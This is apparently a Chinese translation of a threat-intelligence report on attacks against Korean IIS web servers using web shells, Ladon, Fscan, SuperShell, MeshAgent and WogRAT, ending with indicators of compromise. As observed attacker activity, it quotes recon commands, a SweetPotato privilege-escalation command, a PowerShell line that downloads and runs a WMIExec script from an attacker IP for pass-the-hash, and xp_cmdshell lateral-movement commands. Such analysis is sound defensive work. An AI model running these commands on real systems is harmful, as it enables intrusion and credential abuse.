使用 MeshAgent 和 SuperShell 攻击韩国 Web 服务器的案例

最近，韩国网络服务器遭受了利用 MeshAgent 和 SuperShell 的攻击。恶意代码分发地址中存在基于 ELF 的恶意软件，这表明攻击者不仅针对 Windows 服务器，还针对 Linux 服务器。据推测，攻击者利用文件上传漏洞安装了一个 Web Shell，并利用该漏洞安装了其他有效载荷。通过侦察和横向移动，攻击者不仅试图感染受感染的系统，还试图感染组织内的其他系统。

此次攻击中使用的恶意代码分发地址也包含 WogRAT。与 Rekoobe 类似，WogRAT 是一款后门恶意软件，其开发参考了名为“Tiny SHell”的开源恶意软件的例程。此次发现的 WogRAT 的 C&C 服务器地址与过去利用 aNotepad 进行攻击的 WogRAT 的 C&C 服务器地址相同，这表明两起攻击很可能是由同一攻击者实施的。

大部分恶意软件，包括攻击中使用的 Web Shell，都是公开的工具。因此，仅凭所使用的工具，我们才能根据两起案件之间的关联性来识别攻击者。然而，值得注意的是，Ladon、Fscan、MeshAgent 和 SuperShell 等恶意软件过去曾是中文攻击者常用的工具。 

图 1. 流程图

1. 初始访问

初始访问路径未知，但以下路径中存在 Web Shell，表明攻击利用了 Web 服务器的文件上传漏洞。攻击者使用已安装的 Web Shell 运行侦察命令并安装其他有效载荷。

D:WEB*************DataEditorFileg.aspD:WEB*************DataEditorFiletest6aa.aspD:WEB*************DataEditorFiletest6ab.aspD:WEB*************DataEditorFiletest91.aspxD:WEB*************DataEditorFiletest91.aspxD:WEB*************DataEditorFiletest9tunnel1.aspx

2. 坚持

在初始渗透阶段，攻击者会安装 Web Shell 来控制受感染的系统，并利用这些 Web Shell 保持持久性以执行命令。由于目标是 Windows IIS Web 服务器，因此所使用的 Web Shell 均为 ASP 和 ASPX 格式。攻击日志中包含 Chopper、Godzilla 和 ReGe-ORG 等各种 Web Shell 的日志。

图 2. 攻击中使用的 Web Shell

3. 发现

安装Webshell后，攻击者使用以下命令收集受感染系统的信息。

> ipconfig> whoami> whoami /all> systeminfo> netstat -ano> query user> tasklist /svc> ping -nc 1 [IP Address]

使用 Fscan 扫描包括受感染系统在内的网络。

> fscan.exe-hfi.txt-nocolor-silent-orr8.txt> fscan.exe-hfa.txt-nocolor-silent-p 445,135,22 -orr6.txt

图3. 中文开发的Fscan工具

4. 权限提升

在提权过程中，Ladon 被滥用。Ladon 也是一款主要由中文攻击者使用的工具。它支持攻击过程所需的各种功能，因此攻击者可以使用 Ladon 执行各种恶意活动，例如扫描、提权，以及在接管受害者系统后窃取账户信息。除了可执行文件格式的 Ladon 外，还有用 PowerShell 编写的 PowerLadon。在此次攻击案例中，PowerLadon 就被使用过。

即使攻击者可以通过 Web Shell 在受感染的系统上运行命令，由于 w3wp.exe 进程不具备所需的权限，攻击者在攻击过程中也倾向于使用提权恶意软件。在本攻击案例中，攻击者使用了 Ladon 支持的 SweetPotato 命令进行提权。

> powershell -exec bypass Import-Module .Ladon.ps1;Ladon SweetPotato whoami

5.指挥与控制

攻击者除了安装 Web Shell 外，还安装了 SuperShell 和 MeshAgent 来控制受感染的系统。此外，攻击者还安装了代理工具。SuperShell 采用 Go 语言开发，支持 Windows、Linux 和 Android 等多种平台。其主要功能是反向 Shell，允许攻击者远程控制受感染的系统。SuperShell 已被用于攻击管理不善的 Linux 服务器，并且已有 UNC5174 等 APT 攻击者利用该工具的案例被报道。

图 4. GitHub 上的 SuperShell 存储库

MeshAgent 收集远程管理所需的系统基本信息，并提供电源和帐户控制、聊天或消息弹出、文件上传/下载以及命令执行等功能。此外，它还支持远程桌面，尤其是基于 Web 的远程桌面功能，例如 RDP 和 VNC。虽然普通用户可以使用它来远程管理系统，但这些功能也可能被利用进行恶意攻击。

图 5. MeshAgent 的配置文件和 C&C 服务器

攻击者下载恶意软件的IP地址中还包括针对Linux服务器的恶意软件。例如，除了PE格式的恶意软件外，SuperShell还与ELF格式的恶意软件一起被上传，并且确认了WogRAT的存在。WogRAT是一种恶意软件，过去曾利用免费的在线记事本平台aNotepad进行传播。该恶意软件的特征是“WingsOfGod”字符串，攻击者正是利用该字符串创建了恶意软件。WogRAT有Windows和Linux版本，Linux版本借鉴了名为Tiny SHell的开源恶意软件的开发流程，该恶意软件与Rekoobe类似。有关WogRAT的详细分析信息，请参阅现有博客。

WogRAT 的 C&C 服务器 IP 地址与过去案例中的 IP 地址相同，这表明这两起攻击疑似由同一攻击者所为。在过去的案例中，该恶意软件以伪装成 Windows 系统合法实用程序的名称进行传播，但此次确认的案例的不同之处在于，它们攻击的是易受攻击的 Web 服务器。

6. 凭证访问

为了横向移动感染系统并接管受感染系统所在的网络，攻击者需要窃取凭证。目前已确认攻击者使用 WMIExec 和 Ladon 工具进行横向移动，这表明攻击者成功窃取了凭证。攻击者可能使用了各种方法，但其中一种已确认的工具是 Network Password Dump，它可以收集并显示系统中存储的网络身份验证信息。

图 6. 网络密码转储工具

7.横向移动

攻击者成功获取管理员帐户的 NT 哈希，并利用它通过 WMIExec 横向移动到组织内的其他系统。

> IEX (New-Object Net.WebClient).DownloadString('hxxp://139.180.142[.]127/Invoke-WMIExec.ps1');Invoke-WMIExec -Target [IP] -Domain [Domain] -Username Administrator -Hash [Hash] -Command 'whoami' -verbose

此外，MS-SQL Server 也成为攻击目标。我们发现了以下利用文件进行横向移动的 Ladon 命令。

> powershell-ExecutionPolicyBypassImport-Module .Ladon.ps1;LadonRunas[User][Password]whoami> powershell-ExecutionPolicyBypassImport-Module .Ladon.ps1;LadonMssqlCmd[IP][User][Password]masterxp_cmdshell “netuser

8. 结论

最近，有案例证实，针对韩国 IIS 网络服务器的攻击疑似由 WogRAT 攻击背后的同一攻击者实施。攻击者似乎不仅针对 Windows，还针对 Linux，试图通过从初始渗透阶段过渡到横向移动阶段来控制受感染系统所在的网络。虽然最终目标尚不清楚，但如果攻击者成功控制了组织的网络，他们可能会窃取敏感信息或使用勒索软件感染网络。

MD5

• 06ebef1f7cc6fb21f8266f8c9f9ae2d9

• 3f6211234c0889142414f7b579d43c38

• 460953e5f7d1e490207d37f95c4f430a

• 4c8ccdc6f1838489ed2ebeb4978220cb

• 5c835258fc39104f198bca243e730d57

网址

• http[:]//139[.]180[.]142[.]127/Invoke-WMIExec[.]ps1

• http[:]//45[.]76[.]219[.]39/bb

• http[:]//45[.]76[.]219[.]39/mc[.]exe

• http[:]//66[.]42[.]113[.]183/acccc

• http[:]//66[.]42[.]113[.]183/kblockd

IP

• 108[.]61[.]247[.]121

• 66[.]42[.]113[.]183